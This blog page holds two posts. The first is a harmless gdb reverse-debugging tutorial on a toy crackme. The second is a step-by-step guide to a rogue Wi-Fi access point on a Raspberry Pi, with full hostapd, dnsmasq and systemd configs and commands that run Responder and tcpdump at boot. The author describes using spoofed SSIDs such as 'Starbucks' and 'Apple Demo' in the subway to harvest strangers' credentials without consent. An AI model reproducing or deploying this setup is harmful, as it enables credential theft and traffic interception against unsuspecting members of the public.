mercredi 22 février 2017

Stepping backward in gdb

0/ Intro

Yesterday, I discover an awesome feature of gdb: the concept of recording, and stepping backward in a binary.

You read it good! With gdb, you can run a binary step some instructions and then reverse your steps. You can even change values in memory or register, and continue execution.
It's a feature I've searched for solving crackmes. Usually, in crackme you try some passwords, step through functions and subfunctions, then branches are taken depending on the password, and sometimes, you just want to step backward in order to try another branch.
I've never imagined that it's possible with a vanilla gdb.

Reference doc:
https://sourceware.org/gdb/onlinedocs/gdb/Process-Record-and-Replay.html

1/ A heavy weight crackme!

Here is an example of a crackme:

 mitsurugi@dojo:~/chall/reverseGDB$ cat heavyweightcrackme.c   
 #include <stdio.h>  
 #include <stdlib.h>  
 #include <string.h>  
 int heavycalc(char *s) {  
      int a=0;  
      printf("\tBig computation in subfunction\n");  
      a=strlen(s);  
      return a;  
 }  
 int main(int argc, char *argv[]) {  
      printf("Another Crackme\n");  
      if (heavycalc(argv[1]) == 6){  
           printf("Good Boy\n");  
      }  
      else {  
           printf("Bad boy\n");  
      }  
      return(0);  
 }  
 mitsurugi@dojo:~/chall/reverseGDB$  

Nothing really hard, that's just for the demonstration.
The reverser have to input a 6 character long password in order to get the "Good boy" message. Any other length will tell "Bad Boy". The calculation is made in a subfunction.

2/ Reverse stepping GDB in action!

Just use your favorite gdb (higher than v7).

 mitsurugi@dojo:~/chall/reverseGDB$ gdb -q -nx heavyweightcrackme   
 Reading symbols from heavyweightcrackme...(no debugging symbols found)...done.  
 (gdb) b * main  
 Breakpoint 1 at 0x723  
 (gdb) r aaaa  
 Starting program: /home/mitsurugi/chall/reverseGDB/heavyweightcrackme aaaa  
 Breakpoint 1, 0x0000555555554723 in main ()  
 (gdb) record  

Here, we start the recording. Everything will be recorded, memory, breakpoints, registers, flags and so on. Gdb will be able to step backward and forward since that point.

 (gdb) c  
 Continuing.  
 Another Crackme  
      Big computation in subfunction  
 Bad boy  
 The next instruction is syscall exit_group. It will make the program exit. Do you want to stop the program?([y] or n) yes  
 Process record: inferior program stopped.  
 Program stopped.  
 0x00007ffff7af34c6 in __GI__exit (status=status@entry=0) at ../sysdeps/unix/sysv/linux/_exit.c:31  
 31     ../sysdeps/unix/sysv/linux/_exit.c: Aucun fichier ou dossier de ce type.  
 (gdb)  

Ok, we fail at solving this challenge, and we see the "Bad boy" message. (Protip: when gdb ask you to stop the program, answer yes, you will stay in the recorded session).
The magic begins here, with a reverse-continue. It will fast forward until a breakpoint. We have only one, at main.
 (gdb) reverse-continue   
 Continuing.  
 No more reverse-execution history.  
 0x0000555555554723 in main ()   
 (gdb) disass main  
 Dump of assembler code for function main:  
 => 0x0000555555554723 <+0>:     push  %rbp  
   0x0000555555554724 <+1>:     mov  %rsp,%rbp  
   0x0000555555554727 <+4>:     sub  $0x10,%rsp  
   0x000055555555472b <+8>:     mov  %edi,-0x4(%rbp)  
   0x000055555555472e <+11>:     mov  %rsi,-0x10(%rbp)  
   0x0000555555554732 <+15>:     lea  0xef(%rip),%rdi    # 0x555555554828  
   0x0000555555554739 <+22>:     callq 0x555555554590 <puts@plt>  
   0x000055555555473e <+27>:     mov  -0x10(%rbp),%rax  
   0x0000555555554742 <+31>:     add  $0x8,%rax  
   0x0000555555554746 <+35>:     mov  (%rax),%rax  
   0x0000555555554749 <+38>:     mov  %rax,%rdi  
   0x000055555555474c <+41>:     callq 0x5555555546f0 <heavycalc>    //Seems interesting  
   0x0000555555554751 <+46>:     cmp  $0x6,%eax  
   0x0000555555554754 <+49>:     jne  0x555555554764 <main+65>  
   0x0000555555554756 <+51>:     lea  0xdb(%rip),%rdi    # 0x555555554838  
   0x000055555555475d <+58>:     callq 0x555555554590 <puts@plt>  
   0x0000555555554762 <+63>:     jmp  0x555555554770 <main+77>  
   0x0000555555554764 <+65>:     lea  0xd6(%rip),%rdi    # 0x555555554841  
   0x000055555555476b <+72>:     callq 0x555555554590 <puts@plt>  
   0x0000555555554770 <+77>:     mov  $0x0,%eax  
   0x0000555555554775 <+82>:     leaveq   
   0x0000555555554776 <+83>:     retq    
 End of assembler dump.  
 (gdb)  

From now on, we can single step through the binary, examinate memory, add breakpoints (yeah, dynamically!). The heavycalc function seemes interesting because it's return value is checked.
 (gdb) b * 0x000055555555474c  
 Breakpoint 2 at 0x55555555474c  
 (gdb) c  
 Continuing.  
 Breakpoint 2, 0x000055555555474c in main ()  
 (gdb) nexti  
 0x0000555555554751 in main ()  
 (gdb) info reg rax  
 rax      0x4     4  
 (gdb)  

And we can change the execution flow. We see that the rax is compared to six. What happens if we set a 6?Obviously, from now on, the subsequent execution log is deleted and a new execution log starting from the current address will be recorded. This means we will abandon the previously recorded "future" and begin recording a new "future".
 (gdb) set $rax=6  
 Because GDB is in replay mode, changing the value of a register will make the 
execution log unusable from this point onward. Change register rax?(y or n) y 
 (gdb) c  
 Continuing.  
 Good Boy  
 The next instruction is syscall exit_group. It will make the program exit. 
Do you want to stop the program?([y] or n) yes  
 Process record: inferior program stopped.  
 Program stopped.  
 0x00007ffff7af34c6 in __GI__exit (status=status@entry=0) at ../sysdeps/unix/sysv/linux/_exit.c:31  
 31     in ../sysdeps/unix/sysv/linux/_exit.c  
 (gdb)  

Yeah! We have a "Good boy" message. So, it means that heavycalc have to return 6 in order to win. But what do we have in "heavycalc"? Easy, just step backward, and dive into this function:
 (gdb) reverse-continue   
 Continuing.  
 Breakpoint 2, 0x000055555555474c in main ()  
 (gdb) x/10i $rip  
 => 0x55555555474c <main+41>:     callq 0x5555555546f0 <heavycalc>  
   0x555555554751 <main+46>:     cmp  $0x6,%eax  
   0x555555554754 <main+49>:     jne  0x555555554764 <main+65>  
   0x555555554756 <main+51>:     lea  0xdb(%rip),%rdi    # 0x555555554838  
   0x55555555475d <main+58>:     callq 0x555555554590 <puts@plt>  
   0x555555554762 <main+63>:     jmp  0x555555554770 <main+77>  
   0x555555554764 <main+65>:     lea  0xd6(%rip),%rdi    # 0x555555554841  
   0x55555555476b <main+72>:     callq 0x555555554590 <puts@plt>  
   0x555555554770 <main+77>:     mov  $0x0,%eax  
   0x555555554775 <main+82>:     leaveq   
 (gdb) stepi  
 0x00005555555546f0 in heavycalc ()  
 (gdb) disass heavycalc   
 Dump of assembler code for function heavycalc:  
 => 0x00005555555546f0 <+0>:     push  %rbp  
   0x00005555555546f1 <+1>:     mov  %rsp,%rbp  
   0x00005555555546f4 <+4>:     sub  $0x20,%rsp  
   0x00005555555546f8 <+8>:     mov  %rdi,-0x18(%rbp)  
   0x00005555555546fc <+12>:     movl  $0x0,-0x4(%rbp)  
   0x0000555555554703 <+19>:     lea  0xfe(%rip),%rdi    # 0x555555554808  
   0x000055555555470a <+26>:     callq 0x555555554590 <puts@plt>  
   0x000055555555470f <+31>:     mov  -0x18(%rbp),%rax  
   0x0000555555554713 <+35>:     mov  %rax,%rdi  
   0x0000555555554716 <+38>:     callq 0x5555555545a0 <strlen@plt>  
   0x000055555555471b <+43>:     mov  %eax,-0x4(%rbp)  
   0x000055555555471e <+46>:     mov  -0x4(%rbp),%eax  
   0x0000555555554721 <+49>:     leaveq   
   0x0000555555554722 <+50>:     retq    
 End of assembler dump.  
 (gdb)  

And we can inspect memory again, etc, etc..

3/ Outro

This feature is AWESOME \o/
The concept of stepping backward, forward, inspecting memory and so on is full of fun. My next cracking session will be recorded, replayed and enhanced.
The gdb documentation gives a lot of options, actions and possibilities, this blogpost is just here to show a minimal reverseGDB sessions.

And the irony of reversing gdb while reversing binaries strikes on me :)

0xMitsurugi
Winners trains. Loosers complains.

jeudi 16 février 2017

All your credz are belong to me. When raspi meets wifi sniffing.

1/ A wild Raspberry appears!

Two weeks ago, I won in a CTF a raspberry Pi3. After toying a little with the ARM CPU, I decided to make something offensive with this raspi. As you may know, the raspberry 3 comes with an integrated Wifi card, and it's powered with an USB cable:
We don't clearly see the wifi card, but it's here :-)

On the other hand, I have a neat little rescue battery for my phone:
A battery full of energy

This battery delivers 800mA, and its enough to power the raspberry for more than two hours (maybe more, but I never tried for more than two hours and it's largely enough for me). With this setup, I have a portable raspberry and I can walk anywhere.

The idea is to configure the raspberry as an access point, and wait for innocents smartphones to connect with it. Listen the network, then grab as much data as possible. Free credz for me \o/  This kind of tests have been made in the past, but I just want to test it by myself.
It ended to be incredibly easy to setup and successfull.

2/ Setup everything

We need three parts: create an access point, set up some honeypots to gather credz, and sniff data. Once OK, launch everything at boot.

2/1/ Access Point

Before creating the access point, we have to configure the wifi card, and setup a DHCP server.
Add those lines in /etc/network/interfaces:
 allow-hotplug wlan0   
 iface wlan0 inet static   
   address 172.24.1.1  
   netmask 255.255.255.0  
   network 172.24.1.0  
   broadcast 172.24.1.255  

Next, install dnsmasq, and create a specific conf file, only for answering DHCP requests:
 root@raspberrypi:~# mv /etc/dnsmasq.conf /etc/dnsmasq.conf.ori  
 root@raspberrypi:~# cat /etc/dnsmasq.d/dnsmasq.conf   
 # Listen on this specific port instead of the standard DNS port  
 # (53). Setting this to zero completely disables DNS function,  
 # leaving only DHCP and/or TFTP.  
 port=0  
 interface=wlan0   # Use interface wlan0   
 listen-address=172.24.1.1 # Explicitly specify the address to listen on   
 bind-interfaces   # Bind to the interface to make sure we aren't sending things elsewhere   
 domain-needed    # Don't forward short names   
 bogus-priv      # Never forward addresses in the non-routed address spaces.   
 dhcp-range=172.24.1.50,172.24.1.150,12h # Assign IP addresses between 172.24.1.50 and 172.24.1.150 with a 12 hour lease time   
 # DNS is managed by another process, which will send rogue response  
 dhcp-option=6,172.24.1.1  
 root@raspberrypi:~#   

And installing the AP is very straightforward:
 root@raspberrypi:~# apt-get install hostapd  
 create a file /etc/hostap/hostapd.conf  
 root@raspberrypi:~# cat /etc/hostapd/hostapd.conf  
 interface=wlan0  
 driver=nl80211  
 #Configure the name of the SSID to fulfill your needs  
 ssid=My Test SSID  
 hw_mode=g  
 channel=6  
 ieee80211n=1  
 wmm_enabled=1  
 ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]  
 macaddr_acl=0  
 #Warning, this is the configuration for a full Open AP. Anybody can use it.  
 #Don't use it without knowing what you do
 auth_algs=1  
 root@raspberrypi:~#  

Launch it with
 root@raspberrypi:~# hostapd -d /etc/hostapd/hostapd.conf  

You shoud see the SSID "My Test SSID" in any Wifi Device, and connection should work. You won't get internet access, but we don't need it.

2/2/ Honeypoting

I decided to reuse Responder, which is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. It's designed for windows (netbios, and so on) in mind but it works with any smartphone/tablet because of all authentications server.

Once again, really easy:
 root@raspberrypi:~# git clone https://github.com/SpiderLabs/Responder.git  
no configuration file is needed, anything works out of the box. Nice.

2/3/ Sniffing

We will sniff with tcpdump.
 root@raspberrypi:~# apt-get install tcpdump  

2/4/ Launch everything at boot

As I will used this raspberry in my pocket, it must be able to launch everything at boot without ant interaction, then regain access while plugged in a computer with SSH access. For that, I'm using screen and a systemd unit file:
 root@raspberrypi:~# cat /etc/systemd/system/screen_AP.service   
 [Unit]  
 Description=screen for AP  
 [Service]  
 Type=oneshot  
 RemainAfterExit=yes  
 ExecStart=/usr/bin/screen -c /root/screen_AP  
 StandardInput=tty  
 TTYPath=/dev/tty2  
 TTYReset=yes  
 TTYVHangup=yes  
 [Install]  
 WantedBy=multi-user.target  
 root@raspberrypi:~#  

And the screen_AP file launch three tabs, then detach:
 root@raspberrypi:~# cat screen_AP   
 startup_message off  
 defscrollback 100000  
 screen -d -m -t AP hostapd -d /etc/hostapd/hostapd.conf  
 chdir /root/Responder  
 screen -d -m -t Responder ./Responder.py -I wlan0 -bwrf  
 screen -d -m -t tcpdump tcpdump -s0 -n -i wlan0 -w /root/AP.pcap  
 detach  
 root@raspberrypi:~#  
That's it, you're done!

The Pi will boot, setup the wlan0 card, launching it as an AP (dnsmasq start with its own unit file), launch Responder and sniff everything.

3/ Playground

My tests have shown that association is not so easy to achieve
  • A smartphone won't connect to any open wifi magically
  • A smartphone take some long seconds to associate: You can't just walk in the street waiting for phone to connect.
Those two problems can be solved. First, I reuse some well-known SSID names such as "Starbucks", "Apple DEMO", "orange" or "FreeWifi" (I'm in france and those two last names are french ISP providing open wifi) and so on.

Second, for the delay made by the connecting time, I choose the subway. People are standing still for some minutes, and eventually they can be tempted to connect to an open Wifi network. Moreover, subway here doesn't have any cell networks, so phone would be more tempted to join wifi networks I guess.

Let's try
The subway will make a stop to Sniffing Station!

4/ Results

It works. Not really well, but it works, I had connections. For example, with the SSID "Apple Demo" (the ssid available in any apple store) I have associations and connections to captive.apple.com and so on..

For the credz, nothing will be published here, and I can't deny nor confirm anything about them ^_^


The main problem I'm facing is the SSID name. Very unfortunately, the wifi card in the Pi3 can only manage one SSID:
 root@raspberrypi:~# iw list  
 Wiphy phy0  
  (...)  
      valid interface combinations:  
            * #{ managed } <= 1, #{ P2P-device } <= 1, #{ P2P-client, P2P-GO } <= 1,  
             total <= 3, #channels <= 2  
            * #{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1,  
             total <= 4, #channels <= 1  
      Device supports scan flush.  
 root@raspberrypi:~#  
total AP <= 1 , such a bad luck :-(

I can make rolling SSID names, but having 8 SSID at the same time would have been so nice :)

Next step could be:
  • Enhance the AP part with:
    • buying an external USB wifi card :-/
    • roll SSIDs names every 3-4 minutes, but that's unsatisfying
  • Enhance the Responder part with more honeypots and better HTTP response
    • Usually, apps and OS do a GET to a known domainname and wait for a specific string

Good side effects is that I can use the SSID to connect to the raspberry with my phone, thanks to ConnectBot and see logs in real time :-)

5/ Conclusion

That was fun to setup and to see the logs.
Note to myself: be sure than Wifi on my smartphone is turned off :-)

0xMitsurugi
"Cry in the dojo. Laugh on the battlefield."
~ Author unknown